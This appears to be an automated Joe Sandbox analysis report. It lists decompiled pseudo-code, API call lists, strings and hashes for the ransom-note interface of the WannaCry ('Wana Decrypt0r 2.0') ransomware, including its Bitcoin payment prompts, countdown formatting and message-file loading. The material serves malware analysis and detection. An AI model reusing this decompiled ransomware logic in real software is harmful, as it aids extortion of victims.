				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
				_t198 = _t197 + _t192 * 0xfffff1f0;
				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
				_t207 = _t209 + 0x18;
				if(_t204 != 0) {
					_t148 = _t136 + 0x444;
					_push(_t207 + 0x38);
				} else {
					_push(_t207 + 0x38);
					_t148 = _t136 + 0x3c8;
				}
				_t89 = E00405180(_t148);
				_t204 = _t204 + 1;
				if(_t204 < 2) {
					_t196 = 0;
					goto L2;
				}
				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0); // executed
				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0); // executed
				L00412DA6();
				 *(_t207 + 0xa4) = 0;
				_t225 =  *((intOrPtr*)(_t136 + 0x584));
				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
					_t225 = _t225 + st0;
					 *(_t136 + 0x818) = 1;
				}
				_t124 =  *((intOrPtr*)(_t136 + 0x588));
				if(_t124 != 0) {
					 *((long long*)(_t207 + 0x14)) = _t225;
					_t200 =  *((intOrPtr*)(_t207 + 0x18));
					_t193 =  *((intOrPtr*)(_t207 + 0x14));
					_push(_t200);
					_push(_t193);
					_t124 = _t136 + 0x81c;
					_push("%.1f BTC");
					_push(_t136 + 0x81c);
					L00412E00();
					_t210 = _t207 + 0x10;
					_push(_t200);
					_push(_t193);
					_push("Send %.1f BTC to this address:");
					_push(_t210 + 0x10);
					L00412E00();
					_t211 = _t210 + 0x10;
				} else {
					L0041304A();
					_t202 = _t124;
					_push(_t202);
					_push("$%d");
					_push(_t136 + 0x81c);
					L00412E00();
					_t213 = _t207 + 0xc;
					_push(_t202);
					_push("Send $%d worth of bitcoin to this address:");
					_push(_t213 + 0x10);
					L00412E00();
					_t211 = _t213 + 0xc;
				}
				_push( *((intOrPtr*)(_t211 + 0x10)));
				_push(0x402);
				L00412CE6();
				L00412CE0(); // executed
				_t125 =  *((intOrPtr*)(_t136 + 0x824));
				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
				if(_t125 != 0x121284) {
					E004079C0(_t136);
					_t125 =  *((intOrPtr*)(_t211 + 0xac));
					if(_t125 != 0) {
						InvalidateRect( *(_t136 + 0x20), 0, 1);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
					}
				}
				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
				return _t125;
			}

































                                                      0x004076a0
                                                      0x004076a2
                                                      0x004076a7
                                                      0x004076ad
                                                      0x004076ae
                                                      0x004076b5
                                                      0x004076be
                                                      0x004076c1
                                                      0x004076c3
                                                      0x004076c7
                                                      0x004076cb
                                                      0x004076cf
                                                      0x004076d3
                                                      0x004076d9
                                                      0x004076da
                                                      0x004076e0
                                                      0x004076e6
                                                      0x004076e8
                                                      0x004076ed
                                                      0x004076f1
                                                      0x004076f5
                                                      0x004076fa
                                                      0x004076fe
                                                      0x0040770c
                                                      0x00407712
                                                      0x00407712
                                                      0x00407714
                                                      0x0040771e
                                                      0x00407716
                                                      0x00407716
                                                      0x00407716
                                                      0x00407730
                                                      0x00407736
                                                      0x0040773b
                                                      0x0040775b
                                                      0x0040773d
                                                      0x0040773f
                                                      0x00407741
                                                      0x00407745
                                                      0x0040774f
                                                      0x00407747
                                                      0x0040774a
                                                      0x0040774b
                                                      0x0040774b
                                                      0x00407755
                                                      0x00407757
                                                      0x00407757
                                                      0x00407755
                                                      0x00407761
                                                      0x0040776d
                                                      0x00407763
                                                      0x00407763
                                                      0x00407767
                                                      0x00407767
                                                      0x00407784
                                                      0x0040778d
                                                      0x004077aa
                                                      0x004077bf
                                                      0x004077c8
                                                      0x004077d6
                                                      0x004077e6
                                                      0x0040780e
                                                      0x00407814
                                                      0x00407819
                                                      0x0040782c
                                                      0x00407832
                                                      0x0040781b
                                                      0x0040781f
                                                      0x00407820
                                                      0x00407820
                                                      0x00407833
                                                      0x00407838
                                                      0x0040783c
                                                      0x004076d7
                                                      0x00000000
                                                      0x004076d7
                                                      0x0040785b
                                                      0x00407870
                                                      0x00407876
                                                      0x0040787f
                                                      0x0040788a
                                                      0x00407892
                                                      0x00407894
                                                      0x00407896
                                                      0x00407896
                                                      0x004078a0
                                                      0x004078a8
                                                      0x004078db
                                                      0x004078df
                                                      0x004078e3
                                                      0x004078e7
                                                      0x004078e8
                                                      0x004078e9
                                                      0x004078ef
                                                      0x004078f4
                                                      0x004078f5
                                                      0x004078fa
                                                      0x00407901
                                                      0x00407902
                                                      0x00407903
                                                      0x00407908
                                                      0x00407909
                                                      0x0040790e
                                                      0x004078aa
                                                      0x004078aa
                                                      0x004078af
                                                      0x004078b7
                                                      0x004078b8
                                                      0x004078bd
                                                      0x004078be
                                                      0x004078c3
                                                      0x004078ca
                                                      0x004078cb
                                                      0x004078d0
                                                      0x004078d1
                                                      0x004078d6
                                                      0x004078d6
                                                      0x00407917
                                                      0x00407918
                                                      0x0040791d
                                                      0x00407924
                                                      0x00407929
                                                      0x0040792f
                                                      0x0040793e
                                                      0x00407942
                                                      0x00407947
                                                      0x00407950
                                                      0x0040795a
                                                      0x0040796c
                                                      0x00407973
                                                      0x00407984
                                                      0x0040798b
                                                      0x0040798b
                                                      0x00407950
                                                      0x00407994
                                                      0x0040799f
                                                      0x004079af
                                                      0x004079bc

                                                      APIs
                                                      • time.MSVCRT ref: 004076DA
                                                      • sprintf.MSVCRT ref: 0040780E
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                                      • #540.MFC42 ref: 00407876
                                                      • _ftol.MSVCRT ref: 004078AA
                                                      • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                                      • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                                      • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                                      • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                                      • #3092.MFC42(00000402,?), ref: 0040791D
                                                      • #6199.MFC42(00000402,?), ref: 00407924
                                                      • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                                      • #800.MFC42 ref: 0040799F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                                      • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                                      • API String ID: 993288296-3256873439
                                                      • Opcode ID: 7ae64adea42d893420969a4f625596c19cd741f426776df1d4eb6bd519e7d9e8
                                                      • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                                      • Opcode Fuzzy Hash: 7ae64adea42d893420969a4f625596c19cd741f426776df1d4eb6bd519e7d9e8
                                                      • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004060E0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 84%
                                                      			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				struct HINSTANCE__* _t82;
				struct HICON__* _t83;
				intOrPtr _t119;
				intOrPtr _t124;

				_push(0xffffffff);
				_push(E00413E0B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_push(__ecx);
				_t119 = __ecx;
				_push(_a4);
				_push(0x66);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
				_v12 = 2;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
				_v12 = 3;
				E004085C0(__ecx + 0x120);
				_v12 = 4;
				E004085C0(__ecx + 0x1a4);
				_v12 = 5;
				E00404090(__ecx + 0x228);
				_v12 = 6;
				E00404090(__ecx + 0x290);
				_v12 = 7;
				E00404090(__ecx + 0x2f8);
				_v12 = 8;
				E00404090(__ecx + 0x360);
				_v12 = 9;
				E00405000(__ecx + 0x3c8);
				_v12 = 0xa;
				E00405000(__ecx + 0x444);
				_v12 = 0xb;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
				_v12 = 0xc;
				L00412DA6();
				_v12 = 0xd;
				L00412DA6();
				_v12 = 0xe;
				L00412DA6();
				_v12 = 0xf;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x834)) = 0;
				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x844)) = 0;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x854)) = 0;
				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x864)) = 0;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x874)) = 0;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x884)) = 0;
				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
				_v12 = 0x1b;
				_t82 = E00407640(__ecx + 0x888);
				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
				 *((intOrPtr*)(__ecx + 0x894)) = 0;
				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
				_push(0x421798);
				_v12 = 0x1d;
				 *((intOrPtr*)(__ecx)) = 0x4163a0;
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				L00412E5A();
				_push(0x80);
				_push(0xe);
				L00412F2C();
				_t83 = LoadIconA(_t82, 0x80); // executed
				_push(0x421798);
				 *(_t119 + 0x82c) = _t83;
				 *((intOrPtr*)(_t119 + 0x824)) = 0;
				 *((intOrPtr*)(_t119 + 0x828)) = 0;
				 *((intOrPtr*)(_t119 + 0x818)) = 0;
				L00412DA0();
				 *((intOrPtr*)(_t119 + 0x820)) = 0;
				 *[fs:0x0] = _v44;
				return _t119;
			}










                                                      0x004060e0
                                                      0x004060e2
                                                      0x004060ed
                                                      0x004060ee
                                                      0x004060f5
                                                      0x004060fe
                                                      0x00406100
                                                      0x00406101
                                                      0x00406103
                                                      0x00406107
                                                      0x00406113
                                                      0x00406117
                                                      0x0040611c
                                                      0x00406128
                                                      0x0040612f
                                                      0x00406134
                                                      0x00406140
                                                      0x00406147
                                                      0x0040614c
                                                      0x00406158
                                                      0x0040615d
                                                      0x00406168
                                                      0x0040616d
                                                      0x00406178
                                                      0x0040617d
                                                      0x00406188
                                                      0x0040618d
                                                      0x00406198
                                                      0x0040619d
                                                      0x004061a8
                                                      0x004061ad
                                                      0x004061b8
                                                      0x004061bd
                                                      0x004061c8
                                                      0x004061cd
                                                      0x004061d8
                                                      0x004061df
                                                      0x004061e4
                                                      0x004061f0
                                                      0x004061f7
                                                      0x00406202
                                                      0x00406209
                                                      0x00406214
                                                      0x00406219
                                                      0x00406224
                                                      0x00406229
                                                      0x00406233
                                                      0x00406239
                                                      0x0040623f
                                                      0x00406245
                                                      0x0040624b
                                                      0x00406251
                                                      0x00406257
                                                      0x0040625d
                                                      0x00406263
                                                      0x00406269
                                                      0x0040626f
                                                      0x00406275
                                                      0x0040627b
                                                      0x00406281
                                                      0x00406287
                                                      0x0040628d
                                                      0x00406293
                                                      0x00406299
                                                      0x0040629f
                                                      0x004062a5
                                                      0x004062ab
                                                      0x004062b1
                                                      0x004062c1
                                                      0x004062c6
                                                      0x004062cb
                                                      0x004062d5
                                                      0x004062db
                                                      0x004062e5
                                                      0x004062ec
                                                      0x004062f1
                                                      0x004062f7
                                                      0x004062fc
                                                      0x00406303
                                                      0x00406308
                                                      0x00406313
                                                      0x00406318
                                                      0x0040631d
                                                      0x00406322
                                                      0x00406329
                                                      0x0040632f
                                                      0x00406335
                                                      0x00406340
                                                      0x00406346
                                                      0x0040634c
                                                      0x00406352
                                                      0x00406358
                                                      0x00406361
                                                      0x0040636d
                                                      0x00406377

                                                      APIs
                                                      • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                      • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                      • #567.MFC42(00000066,00000000), ref: 0040612F
                                                      • #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                        • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                        • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                                        • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                                        • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                                        • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                        • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                                        • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                        • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                                        • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                                      • #567.MFC42(00000066,00000000), ref: 004061DF
                                                      • #540.MFC42(00000066,00000000), ref: 004061F7
                                                      • #540.MFC42(00000066,00000000), ref: 00406209
                                                      • #540.MFC42(00000066,00000000), ref: 00406219
                                                      • #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                                      • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                                      • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                                      • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                                      • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                                      • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                                      • #860.MFC42(00421798), ref: 00406358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                                      • String ID: 0ZA$0ZA$0ZA$DZA
                                                      • API String ID: 3237077636-3729005435
                                                      • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                                      • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406AE0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 64%
                                                      			E00406AE0(void* __ecx) {
				char _v4;
				char _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v40;
				void* _v280;
				char _v284;
				char _v288;
				char _v292;
				void* _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				void* _v312;
				void* _v316;
				char** _t26;
				long _t30;
				void* _t31;
				char** _t32;
				void* _t56;
				intOrPtr _t58;
				void* _t60;

				_push(0xffffffff);
				_push(E00413E61);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_t56 = __ecx;
				L00412DA6();
				_t26 =  &_v284;
				_push(_t26);
				_v4 = 0;
				L00412DD6(); // executed
				_push("msg\\");
				L00412CAA();
				_push("m_%s.wnry");
				_push(_t26);
				_push( &_v288);
				_v12 = 1;
				L00412CCE();
				sprintf( &_v292,  *_t26, _v304);
				_t60 = _t58 - 0x110 + 0xc;
				L00412CC2();
				_v24 = 0;
				L00412CC2();
				_t30 = GetFileAttributesA( &_v292); // executed
				if(_t30 == 0xffffffff) {
					_push("msg\\");
					L00412CAA();
					_push("m_%s.wnry");
					_push(_t30);
					_t32 =  &_v300;
					_v28 = 2;
					_push(_t32);
					L00412CCE();
					sprintf( &_v308,  *_t32, "English");
					_t60 = _t60 + 0xc;
					L00412CC2();
					_v40 = 0;
					L00412CC2();
				}
				_t31 = E00406CF0(_t56,  &_v292);
				_v28 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] = _v36;
				return _t31;
			}


























                                                      0x00406ae0
                                                      0x00406ae2
                                                      0x00406aed
                                                      0x00406aee
                                                      0x00406afc
                                                      0x00406b03
                                                      0x00406b08
                                                      0x00406b0f
                                                      0x00406b10
                                                      0x00406b1b
                                                      0x00406b20
                                                      0x00406b29
                                                      0x00406b2e
                                                      0x00406b37
                                                      0x00406b38
                                                      0x00406b39
                                                      0x00406b41
                                                      0x00406b59
                                                      0x00406b5b
                                                      0x00406b62
                                                      0x00406b6b
                                                      0x00406b73
                                                      0x00406b7d
                                                      0x00406b86
                                                      0x00406b88
                                                      0x00406b91
                                                      0x00406b96
                                                      0x00406b9b
                                                      0x00406b9c
                                                      0x00406ba0
                                                      0x00406ba8
                                                      0x00406ba9
                                                      0x00406bbb
                                                      0x00406bbd
                                                      0x00406bc4
                                                      0x00406bcd
                                                      0x00406bd5
                                                      0x00406bd5
                                                      0x00406be1
                                                      0x00406bea
                                                      0x00406bf5
                                                      0x00406c03
                                                      0x00406c10

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                                      • String ID: English$m_%s.wnry$msg\
                                                      • API String ID: 3713669620-4206458537
                                                      • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                                      • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405A60 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 94%
                                                      			E00405A60(void* __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				void* _v140;
				void* _v928;
				void* _v932;
				void* _v936;
				void* _v1000;
				char _v1124;
				char _v1248;
				char _v1352;
				char _v1456;
				char _v1560;
				char _v1664;
				char _v1796;
				char _v1928;
				void* _v1992;
				void* _v2056;
				void* _v2120;
				char _v2212;
				char _v2216;
				intOrPtr _t144;

				_push(0xffffffff);
				_push(E00413A76);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t144;
				E0040B620(L"Wana Decrypt0r 2.0", 1);
				_push(0);
				L00412F08();
				L00412F02();
				L00412EFC();
				E004060E0( &_v2212, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
				L00412B72(); // executed
				_v8 = 0x1d;
				_v24 = 0x415a30;
				E00403F20( &_v24);
				_v8 = 0x1c;
				_v32 = 0x415a30;
				E00403F20( &_v32);
				_v8 = 0x1b;
				_v40 = 0x415a30;
				E00403F20( &_v40);
				_v8 = 0x1a;
				_v48 = 0x415a44;
				E00403F20( &_v48);
				_v8 = 0x19;
				_v56 = 0x415a44;
				E00403F20( &_v56);
				_v8 = 0x18;
				_v64 = 0x415a44;
				E00403F20( &_v64);
				_v8 = 0x17;
				_v72 = 0x415a44;
				E00403F20( &_v72);
				_v8 = 0x16;
				_v80 = 0x415a44;
				E00403F20( &_v80);
				_v8 = 0x15;
				_v88 = 0x415a44;
				E00403F20( &_v88);
				_v8 = 0x14;
				_v96 = 0x415a44;
				E00403F20( &_v96);
				_v8 = 0x13;
				_v104 = 0x415a44;
				E00403F20( &_v104);
				_v8 = 0x12;
				E00403F90( &_v112);
				_v8 = 0x11;
				E00403F90( &_v120);
				_v8 = 0x10;
				L00412CC2();
				_v8 = 0xf;
				L00412CC2();
				_v8 = 0xe;
				L00412CC2();
				_v8 = 0xd;
				L00412CC2();
				_v8 = 0xc;
				L00412EF6();
				_v8 = 0xb;
				E004050A0( &_v1124);
				_v8 = 0xa;
				E004050A0( &_v1248);
				_v8 = 9;
				E00404170( &_v1352);
				_v8 = 8;
				E00404170( &_v1456);
				_v8 = 7;
				E00404170( &_v1560);
				_v8 = 6;
				E00404170( &_v1664);
				_v8 = 5;
				E00405D90( &_v1796);
				_v8 = 4;
				E00405D90( &_v1928);
				_v8 = 3;
				L00412EF0();
				_v8 = 2;
				L00412EF0();
				_v8 = 1;
				L00412D4C();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return 0;
			}





































                                                      0x00405a60
                                                      0x00405a62
                                                      0x00405a6d
                                                      0x00405a6e
                                                      0x00405a85
                                                      0x00405a8a
                                                      0x00405a8c
                                                      0x00405a96
                                                      0x00405a9b
                                                      0x00405aa6
                                                      0x00405ab3
                                                      0x00405abe
                                                      0x00405ac1
                                                      0x00405ad2
                                                      0x00405add
                                                      0x00405ae4
                                                      0x00405af0
                                                      0x00405af8
                                                      0x00405aff
                                                      0x00405b0b
                                                      0x00405b13
                                                      0x00405b1a
                                                      0x00405b2b
                                                      0x00405b33
                                                      0x00405b3a
                                                      0x00405b46
                                                      0x00405b4e
                                                      0x00405b55
                                                      0x00405b61
                                                      0x00405b69
                                                      0x00405b70
                                                      0x00405b7c
                                                      0x00405b84
                                                      0x00405b8b
                                                      0x00405b90
                                                      0x00405b98
                                                      0x00405ba6
                                                      0x00405bb2
                                                      0x00405bba
                                                      0x00405bc1
                                                      0x00405bcd
                                                      0x00405bd5
                                                      0x00405bdc
                                                      0x00405be8
                                                      0x00405bf0
                                                      0x00405bf7
                                                      0x00405c03
                                                      0x00405c0b
                                                      0x00405c17
                                                      0x00405c1f
                                                      0x00405c2b
                                                      0x00405c33
                                                      0x00405c3f
                                                      0x00405c47
                                                      0x00405c53
                                                      0x00405c5b
                                                      0x00405c67
                                                      0x00405c6f
                                                      0x00405c7b
                                                      0x00405c83
                                                      0x00405c8f
                                                      0x00405c97
                                                      0x00405ca3
                                                      0x00405cab
                                                      0x00405cb7
                                                      0x00405cbf
                                                      0x00405ccb
                                                      0x00405cd3
                                                      0x00405cdf
                                                      0x00405ce7
                                                      0x00405cf3
                                                      0x00405cfb
                                                      0x00405d07
                                                      0x00405d0f
                                                      0x00405d1b
                                                      0x00405d23
                                                      0x00405d2f
                                                      0x00405d37
                                                      0x00405d43
                                                      0x00405d4b
                                                      0x00405d54
                                                      0x00405d5c
                                                      0x00405d65
                                                      0x00405d70
                                                      0x00405d7f
                                                      0x00405d8c

                                                      APIs
                                                        • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                        • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                        • Part of subcall function 0040B620: KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040B663
                                                        • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                        • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                        • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                                        • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                                      • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                                      • #2621.MFC42 ref: 00405A96
                                                      • #6438.MFC42 ref: 00405A9B
                                                        • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
